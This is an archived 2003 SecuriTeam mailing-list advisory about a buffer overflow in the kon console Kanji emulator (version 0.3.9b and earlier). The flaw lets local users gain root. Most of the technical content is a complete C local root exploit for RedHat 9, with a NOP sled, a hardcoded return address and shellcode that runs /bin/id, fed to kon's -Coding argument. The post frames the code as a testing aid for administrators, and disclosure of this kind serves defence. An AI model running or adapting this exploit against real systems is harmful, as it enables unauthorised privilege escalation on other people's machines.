[EXPL] Kon Exploit Code Released (Local)

From: SecuriTeam (support_at_securiteam.com)
Date: 06/16/03

  • Next message: SecuriTeam: "[REVS] Improving Web Application Security: Threats and Countermeasures" 
    To: list@securiteam.com
Date: 16 Jun 2003 19:57:13 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Latest attack techniques.

    You're a pen tester, but is google.com still your R&D team?
    Now you can get trustworthy commercial-grade exploits and the latest
    techniques from a world-class research group.

    Learn more at http://www.coresecurity.com/promos/sit_e1,
    or call 617-399-6980

    - - - - - - - - -

      Kon Exploit Code Released (Local)
    ------------------------------------------------------------------------

    SUMMARY

    KON is a Kanji emulator for the console. There is a buffer overflow
    vulnerability in the command line parsing code portion of the kon program
    up to and including version 0.3.9b. This vulnerability, if appropriately
    exploited, can lead to local users being able to gain elevated (root)
    privileges. The following exploit code can be used by administrators to
    test their system for the mentioned vulnerability.

    DETAILS

    Exploit:
    /*
     * Buffer overflow in /usr/bin/kon v0.3.9b for RedHat 9.0
     *
     *
     * The original bug was found by wszx for RedHat 8.0 - Ported to C
     *
     * Compile: gcc -Wall kon2root kon2root.c
     *
     */

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    #define NOP 0x90
    #define RET 0xbffffffa
    #define VULN "/usr/bin/kon"
    #define MAXBUF 800

    static char w00tI4r3l33t[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07
    \x89"
                               "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56
    \x0c"
                       "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8
    \xdc\xff"
                       "\xff\xff/bin/id";

       
    int main()
    {
    int i, *egg;
    long retaddr;
    static char buff[MAXBUF];
    static char *sploit[0x02] = { w00tI4r3l33t, NULL };

    fprintf (stdout, "\n\n\n[ PoC code for local root exploit in %s ]
    \n", VULN);
    fprintf (stdout, "[ Coded by c0ntex - http://62.31.72.168 ]\n");
    fprintf (stdout, "[ For Linux RedHat v9 x86 - Ret_Addr
    0xbffffffa ]\n\n\n\n");

    if((retaddr = 0xbffffffa - strlen(w00tI4r3l33t) - strlen(VULN)) !
    = 0x00) {
    egg = (int *)(buff);
    }

    for(i = 0x00; i < MAXBUF; i += 0x04)
    *(egg)++ = retaddr; *(egg) = NOP;

    execle(VULN, VULN, "-Coding", buff, NULL, sploit);

    return(0x00);
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:c0ntex@hushmail.com> c0ntex.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[REVS] Improving Web Application Security: Threats and Countermeasures"

    Relevant Pages